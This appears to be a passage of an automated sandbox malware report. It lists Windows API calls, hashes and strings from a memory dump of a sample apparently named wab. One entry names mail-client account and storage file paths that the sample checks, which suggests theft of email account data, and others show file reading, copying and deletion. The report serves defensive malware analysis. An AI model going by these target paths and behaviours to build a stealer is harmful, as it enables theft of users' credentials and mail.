                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                          • Opcode ID: 394c19cde857b2ad9d90f67de35a08d6cca2c87863d5a7e85b0dedb74c032620
                                                                                                                                                                                                          • Instruction ID: 7097e7e6e14e788e7c0bb80ce78215695856839c1d03c566d48427a1c3a3a89e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 394c19cde857b2ad9d90f67de35a08d6cca2c87863d5a7e85b0dedb74c032620
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7F05F71C10209EBCF04EBB4C54AA9EBBF8FF18315F514895A412F7140E778AB069B51
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,37562C3B,3756D1DC,00000017), ref: 37562B21
                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(3756D1DC,?,37562C3B,3756D1DC,00000017), ref: 37562B2A
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409,?,37562C3B,3756D1DC,00000017), ref: 37562B35
                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,37562C3B,3756D1DC,00000017), ref: 37562B3C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37560000_wab.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
• String ID:
• API String ID: 3231755760-0
• Opcode ID: 4d0f0878b29c5a1ab7d3d7b8caf66671a67b79d8740085836efabfa1313be4d7
• Instruction ID: 87fbf462f1e28149cb83dc7bfb3f5344d7ad0bc7a18050b565a6e6ecc5d9481f
• Instruction Fuzzy Hash: DFD0E971084344FBDE043BEADE0EA593B28AB09666F045810F709B6451EA7B9457CB55
Uniqueness
• Uniqueness Score: -1.00%
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 375661DA
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 375661E4
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 375661F1
Memory Dump Source
• Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
• Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37560000_wab.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 29f0f9ca6dcb3c1987d51f60c221891d51443a611d55080ff59b275eb6a88897
• Instruction ID: cfb578cfaeadcd5101caee0015e6aea25aa147050d3d7fc65ba35f1ad7abc7d5
• Instruction Fuzzy Hash: FE31E87494121CABCB25DF24D988BCDBBB4FF48314F5051DAE81CA7250EB749B858F45
Uniqueness
• Uniqueness Score: -1.00%
APIs
• GetCurrentProcess.KERNEL32(?,?,37564A8A,?,37572238,0000000C,37564BBD,00000000,00000000,?,37562082,37572108,0000000C,37561F3A,?), ref: 37564AD5
• TerminateProcess.KERNEL32(00000000,?,37564A8A,?,37572238,0000000C,37564BBD,00000000,00000000,?,37562082,37572108,0000000C,37561F3A,?), ref: 37564ADC
• ExitProcess.KERNEL32 ref: 37564AEE
Memory Dump Source
• Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
• Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37560000_wab.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 028765b8bb4b80eb211457921e653822d5dddf462841729d1c180a88ca7927a7
• Instruction ID: 3fb8904076e50beec25e30f74513f1cdafcc3dd188b87cd23ea251df6ac94724
• Instruction Fuzzy Hash: D0E04F35000244AFCF097F59CD0DA893B2AEF40366B409410F90477021DF3AED83DA44
Uniqueness
• Uniqueness Score: -1.00%
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 3756294C
Memory Dump Source
• Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
• Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37560000_wab.jbxd
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
• Opcode ID: 1dd6cf2ae52fddf836cd9c8aa2319b3c4d8ba60a79e5ce8f6e73da43cd261b67
• Instruction ID: 635c07a1edb139c14fac55e84b51847c415e4fe95b9fc7e215c43bd6eb731ec0
• Instruction Fuzzy Hash: B741ABB19112848BEB18CF54C48679EBBF4FB48328F24856AE405FB344D7B9EA41CB60
Uniqueness
• Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
• Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37560000_wab.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
• Opcode ID: 23b691e6924d9534ef8fbc2777c66e017936323f3c4e9e219663b449dd28a179
• Instruction ID: ae11916aa59ca89edfe433bd060a1ba55f0998b53168300652dc70dc3612204a
• Instruction Fuzzy Hash: D0A011302802828F8B088E38830F20C3AACAA082E03000028B808F0200FB2E80038A02
Uniqueness
• Uniqueness Score: -1.00%
Control-flow Graph: [rendered graph not reproduced; legend: Executed / Not Executed]
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
• Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37560000_wab.jbxd
Similarity
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt
• API String ID: 3527080286-3064271455
• Opcode ID: 48b4813459f40b1ee75c2e89dc67250170630dffaaebeb164f61f7e182cc66d2
• Instruction ID: 13cb8176f063cb80bfe35b450943e61635704e4455e7ba1b195e987f0dc1afe6
• Instruction Fuzzy Hash: 0651A1B4A00749DBEF08CFA4D58C2AC7BB0FF49328F515996E480BB265CB359E24CB54
Uniqueness
• Uniqueness Score: -1.00%
Control-flow Graph
APIs
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 37561D1B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 37561D37
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37561D4B
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37561D58
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37561D72
• CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37561D7D
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37561D8A
Memory Dump Source
• Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
• Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1454806937-0
                                                                                                                                                                                                          • Opcode ID: 7e5e21239ebc98aae95431dc708b78b5bee6b469cc7033d15bce374e08ecc32d
                                                                                                                                                                                                          • Instruction ID: 3725977526919950f0daec1ff56fa10e508433aa9c767d1092aa77281866ca1c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e5e21239ebc98aae95431dc708b78b5bee6b469cc7033d15bce374e08ecc32d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B2135B194121CBFEB14ABA48C8DEEB76BCEB48358F401965F611F2140E6749E468B71
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph of the function at 375639be: basic blocks call LoadLibraryExW, GetLastError and FreeLibrary and the subroutine at 375655f6; graph rendering omitted]
Strings
Memory Dump Source
• Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
• Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37560000_wab.jbxd
Similarity
• API ID:
• String ID: api-ms-$ext-ms-
• API String ID: 0-537541572
• Opcode ID: 546d210e84f5c3aa6d6b4f70e816928699c935e318b00916690cf7f29769274c
• Instruction ID: ecec811a404c804b1d919a09645154bf688be4a1b153f108107d3f14c0cda8b5
• Opcode Fuzzy Hash: 546d210e84f5c3aa6d6b4f70e816928699c935e318b00916690cf7f29769274c
• Instruction Fuzzy Hash: CB110D76A41321BBDB199A398C4DB1A37589F297B8F003621FC05B7281EF35ED01D6D0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• lstrcatW.KERNEL32(?,?), ref: 37561038
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 3756104B
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 37561061
• lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 37561075
• GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 37561090
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 375610B8
Memory Dump Source
• Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
• Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37560000_wab.jbxd
Similarity
• API ID: lstrlen$AttributesFilelstrcat
• String ID:
• API String ID: 3594823470-0
• Opcode ID: 95a8692bd516e629247653a2111481d0461eaae2fdc1e101ff5e00497d47eaed
• Instruction ID: 06d33efb468468d045d8361ac3cfe364dfd7c17e96f1b005d4d70717cef54b7d
• Opcode Fuzzy Hash: 95a8692bd516e629247653a2111481d0461eaae2fdc1e101ff5e00497d47eaed
• Instruction Fuzzy Hash: 7521A675900318ABCF58EA64DC4CDEB3738EF84338F105556E895A71A1EE349A85CB41
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 37561E89: lstrlenW.KERNEL32(?,?,?,?,?,375610DF,?,?,?,00000000), ref: 37561E9A
  • Part of subcall function 37561E89: lstrcatW.KERNEL32(?,?), ref: 37561EAC
  • Part of subcall function 37561E89: lstrlenW.KERNEL32(?,?,375610DF,?,?,?,00000000), ref: 37561EB3
  • Part of subcall function 37561E89: lstrlenW.KERNEL32(?,?,375610DF,?,?,?,00000000), ref: 37561EC8
  • Part of subcall function 37561E89: lstrcatW.KERNEL32(?,375610DF), ref: 37561ED3
• GetFileAttributesW.KERNEL32(?,?,?,?), ref: 3756122A
Strings
Memory Dump Source
• Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
• Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37560000_wab.jbxd
Similarity
• API ID: lstrlen$lstrcat$AttributesFile
• String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
• API String ID: 1475205934-1520055953
• Opcode ID: 957e1d69d283eeefec265f102e3c714fedc7994ba636bedfb177471744500473
• Instruction ID: d63e41163a63f5637122dceb18a44e4e4c6934d0f1ae53173223e504392be236
• Opcode Fuzzy Hash: 957e1d69d283eeefec265f102e3c714fedc7994ba636bedfb177471744500473
• Instruction Fuzzy Hash: C321D5B9E102486BEB1897A0EC85FFD7339EF80718F501546F604EB1D0EAB55E80875A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph of the function at 37564b39: basic blocks call GetModuleHandleExW, GetProcAddress and FreeLibrary and the subroutine at 37562ada; graph rendering omitted]
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,37564AEA,?,?,37564A8A,?,37572238,0000000C,37564BBD,00000000,00000000), ref: 37564B59
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 37564B6C
• FreeLibrary.KERNEL32(00000000,?,?,?,37564AEA,?,?,37564A8A,?,37572238,0000000C,37564BBD,00000000,00000000,?,37562082), ref: 37564B8F
Strings
Memory Dump Source
• Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
• Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37560000_wab.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: c80daf5853d3e2691a1842ea80705380fd3ced08b481ffd08a24ae9621d02eb8
• Instruction ID: affffb8e3c742ef2fc284ba6f2ecb976d61f1244fdfed60b0ed87ea22356179e
• Opcode Fuzzy Hash: c80daf5853d3e2691a1842ea80705380fd3ced08b481ffd08a24ae9621d02eb8
• Instruction Fuzzy Hash: EBF08171940208BFCF19AB94C80DB9D7FB9EF08366F401155F805B2150DB3A9E42CA91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph of the function at 37569492: basic blocks call GetConsoleCP, WideCharToMultiByte, WriteFile (two call sites) and GetLastError and the subroutines at 37562ada, 37567c19 and 375679e6; graph rendering omitted]
APIs
• GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,37569C07,?,00000000,?,00000000,00000000), ref: 375694D4
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 37569590
• WriteFile.KERNEL32(?,?,00000000,37569C07,00000000,?,?,?,?,?,?,?,?,?,37569C07,?), ref: 375695AF
• WriteFile.KERNEL32(?,?,?,37569C07,00000000,?,?,?,?,?,?,?,?,?,37569C07,?), ref: 375695E8
Memory Dump Source
• Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
• Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37560000_wab.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleMultiWide
• String ID:
• API String ID: 977765425-0
• Opcode ID: ca9ba879dcbdecf6a10645baeec3cf915f779b66c9188481e12fd1f161cdc084
• Instruction ID: c563a562d1d13ae18992308b4117b159141c5cee4558a9092646b54e40bcd3d8
• Opcode Fuzzy Hash: ca9ba879dcbdecf6a10645baeec3cf915f779b66c9188481e12fd1f161cdc084
• Instruction Fuzzy Hash: 0351A3B19003859FDB04CFA8C899AEEFBB4EF08314F10551EE551F7281E774A942CBA1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(?,?,?,?,?,375610DF,?,?,?,00000000), ref: 37561E9A
• lstrcatW.KERNEL32(?,?), ref: 37561EAC
• lstrlenW.KERNEL32(?,?,375610DF,?,?,?,00000000), ref: 37561EB3
• lstrlenW.KERNEL32(?,?,375610DF,?,?,?,00000000), ref: 37561EC8
• lstrcatW.KERNEL32(?,375610DF), ref: 37561ED3
Memory Dump Source
• Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
• Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37560000_wab.jbxd
Similarity
• API ID: lstrlen$lstrcat
• String ID:
• API String ID: 493641738-0
• Opcode ID: 3c33c1a114387f8e74385155e8b707fe3e6dfc84240105b26c203ef47445799e
• Instruction ID: 8e144a9fb5232b5ebdb23b938c610f604a4f77ae81c450d76a54e982d991e5e5
• Opcode Fuzzy Hash: 3c33c1a114387f8e74385155e8b707fe3e6dfc84240105b26c203ef47445799e
• Instruction Fuzzy Hash: E1F0B43A5402107AD629375AAC89E7F7B7CEFC5B70F400019F508A3180EB59684283A5
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,3756190E,?,?,00000000,?,00000000), ref: 37561643
• lstrcatW.KERNEL32(?,?), ref: 3756165A
• lstrlenW.KERNEL32(?,?,?,?,?,3756190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 37561661
• lstrcatW.KERNEL32(00001008,?), ref: 37561686
Memory Dump Source
• Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
• Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37560000_wab.jbxd
Similarity
• API ID: lstrcatlstrlen
• String ID:
• API String ID: 1475610065-0
• Opcode ID: e2b22d822c05cd1d3bdd34bc2efa67546ab7a2567fbbc6453163d9044ddcaa61
• Instruction ID: 6422d5877d9d15a09f48c25c600af95b7a8efeadb6fae63a270ebb3a5279d264
• Opcode Fuzzy Hash: e2b22d822c05cd1d3bdd34bc2efa67546ab7a2567fbbc6453163d9044ddcaa61
• Instruction Fuzzy Hash: 5D21C836900204BBDB089F64DC85EFE77B8EF88725F14541BE504BB140EB38A64287A6
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32 ref: 3756715C
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 3756717F
  • Part of subcall function 375656D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 37565702
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 375671A5
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 375671C7
Memory Dump Source
• Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
• Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37560000_wab.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
• String ID:
• API String ID: 1794362364-0
• Opcode ID: 02d83b21a1e30d8fabdfac25bde4ddc4b67f1242d8777c903afa28cba4d21fd9
• Instruction ID: 67ebc5e00cc21498955dbe609f0bd2f414bacc848fd09880e86d9ff834e87912
• Opcode Fuzzy Hash: 02d83b21a1e30d8fabdfac25bde4ddc4b67f1242d8777c903afa28cba4d21fd9
• Instruction Fuzzy Hash: DF0184F66453157B27191ABA4C8CD7B6A6DDBC2EB8750192FBD04E7200EE799C0281F1
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,37561D66,00000000,00000000,?,37565C88,37561D66,00000000,00000000,00000000,?,37565E85,00000006,FlsSetValue), ref: 37565D13
• GetLastError.KERNEL32(?,37565C88,37561D66,00000000,00000000,00000000,?,37565E85,00000006,FlsSetValue,3756E190,FlsSetValue,00000000,00000364,?,37565BC8), ref: 37565D1F
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,37565C88,37561D66,00000000,00000000,00000000,?,37565E85,00000006,FlsSetValue,3756E190,FlsSetValue,00000000), ref: 37565D2D
Memory Dump Source
• Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
• Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37560000_wab.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: b40b2a5f58c7d506d4800dcde62cef16358c5be576c2aa3a93842245d98ef1b9
• Instruction ID: ec1cdb48f944eea0efab8cbb275bce02ee8597245b53b688877c421ef31b7ea8
• Opcode Fuzzy Hash: b40b2a5f58c7d506d4800dcde62cef16358c5be576c2aa3a93842245d98ef1b9
• Instruction Fuzzy Hash: 0C014C362C2322ABD7595E2CCC4DB463768AF057F4B101E20FB15F7180DB25D502C6D0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetOEMCP.KERNEL32(00000000,?,?,37566C7C,?), ref: 37566A1E
• GetACP.KERNEL32(00000000,?,?,37566C7C,?), ref: 37566A35
Strings
Memory Dump Source
• Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
• Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37560000_wab.jbxd
Similarity
• API ID:
• String ID: |lV7
• API String ID: 0-356298145
• Opcode ID: 6f6b7ad230db2c7b8c62f4f40b750d29e02c32ce9ffeeac441d1f97acc32121b
• Instruction ID: 2c0b71e0690ee2d7b668cd02e30c8aa5bcc3f21f2313ab353a2361d0e65497b7
• Opcode Fuzzy Hash: 6f6b7ad230db2c7b8c62f4f40b750d29e02c32ce9ffeeac441d1f97acc32121b
• Instruction Fuzzy Hash: A2F06934841288CFEB08DF68C8497683B70EB0037DF546745E428AA1C4EF7A98878B42
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 7%
Dynamic/Decrypted Code Coverage: 9.2%
Signature Coverage: 1.1%
Total number of Nodes: 2000
Total number of Limit Nodes: 77
40a8df wcslen 38057->38059 38060 40a906 ??3@YAXPAX 38058->38060 38061 40a90f 38058->38061 38059->38058 38062 40a919 38060->38062 38063 4099f4 3 API calls 38061->38063 38064 40a932 38062->38064 38065 40a929 ??3@YAXPAX 38062->38065 38063->38062 38067 4099f4 3 API calls 38064->38067 38066 40a93e memcpy 38065->38066 38066->37983 38068 40a93d 38067->38068 38068->38066 38070 409a41 38069->38070 38071 4099fb 38069->38071 38070->37983 38071->38071 38072 409a0a malloc 38071->38072 38073 409a37 38072->38073 38074 409a1c 38072->38074 38073->37983 38075 409a30 ??3@YAXPAX 38074->38075 38076 409a20 memcpy 38074->38076 38075->38073 38076->38075 38078 40a9e7 38077->38078 38079 40a9dc ??3@YAXPAX 38077->38079 38081 4099f4 3 API calls 38078->38081 38080 40a9f2 38079->38080 38080->37984 38081->38080 38106 409bca GetModuleFileNameW 38082->38106 38084 40dce6 wcsrchr 38085 40dcf5 38084->38085 38086 40dcf9 wcscat 38084->38086 38085->38086 38086->37992 38107 44db70 38087->38107 38091 40dbfd 38110 4447d9 38091->38110 38094 40dc34 wcscpy wcscpy 38136 40d6f5 38094->38136 38095 40dc1f wcscpy 38095->38094 38098 40d6f5 3 API calls 38099 40dc73 38098->38099 38100 40d6f5 3 API calls 38099->38100 38101 40dc89 38100->38101 38102 40d6f5 3 API calls 38101->38102 38103 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38102->38103 38142 40da80 38103->38142 38106->38084 38108 40dbb4 memset memset 38107->38108 38109 409bca GetModuleFileNameW 38108->38109 38109->38091 38112 4447f4 38110->38112 38111 40dc1b 38111->38094 38111->38095 38112->38111 38113 444807 ??2@YAPAXI 38112->38113 38114 44481f 38113->38114 38115 444873 _snwprintf 38114->38115 38116 4448ab wcscpy 38114->38116 38149 44474a 8 API calls 38115->38149 38118 4448bb 38116->38118 38150 44474a 8 API calls 38118->38150 38119 4448a7 38119->38116 38119->38118 38121 4448cd 38151 44474a 8 API calls 38121->38151 38123 4448e2 38152 44474a 8 API calls 38123->38152 38125 4448f7 38153 44474a 8 API calls 38125->38153 38127 44490c 38154 44474a 8 API calls 
38127->38154 38129 444921 38155 44474a 8 API calls 38129->38155 38131 444936 38156 44474a 8 API calls 38131->38156 38133 44494b 38157 44474a 8 API calls 38133->38157 38135 444960 ??3@YAXPAX 38135->38111 38137 44db70 38136->38137 38138 40d702 memset GetPrivateProfileStringW 38137->38138 38139 40d752 38138->38139 38140 40d75c WritePrivateProfileStringW 38138->38140 38139->38140 38141 40d758 38139->38141 38140->38141 38141->38098 38143 44db70 38142->38143 38144 40da8d memset 38143->38144 38145 40daac LoadStringW 38144->38145 38146 40dac6 38145->38146 38146->38145 38148 40dade 38146->38148 38158 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38146->38158 38148->37920 38149->38119 38150->38121 38151->38123 38152->38125 38153->38127 38154->38129 38155->38131 38156->38133 38157->38135 38158->38146 38169 409b98 GetFileAttributesW 38159->38169 38161 40daea 38162 40db63 38161->38162 38163 40daef wcscpy wcscpy GetPrivateProfileIntW 38161->38163 38162->37922 38170 40d65d GetPrivateProfileStringW 38163->38170 38165 40db3e 38171 40d65d GetPrivateProfileStringW 38165->38171 38167 40db4f 38172 40d65d GetPrivateProfileStringW 38167->38172 38169->38161 38170->38165 38171->38167 38172->38162 38210 40eaff 38173->38210 38177 411ae2 memset 38176->38177 38178 411b8f 38176->38178 38250 409bca GetModuleFileNameW 38177->38250 38190 411a8b 38178->38190 38180 411b0a wcsrchr 38181 411b22 wcscat 38180->38181 38182 411b1f 38180->38182 38251 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38181->38251 38182->38181 38184 411b67 38252 402afb 38184->38252 38188 411b7f 38308 40ea13 SendMessageW memset SendMessageW 38188->38308 38191 402afb 27 API calls 38190->38191 38192 411ac0 38191->38192 38193 4110dc 38192->38193 38194 41113e 38193->38194 38199 4110f0 38193->38199 38333 40969c LoadCursorW SetCursor 38194->38333 38196 411143 38206 40b633 ??3@YAXPAX 38196->38206 38334 4032b4 38196->38334 38352 40b1ab ??3@YAXPAX ??3@YAXPAX 38196->38352 38353 444a54 38196->38353 
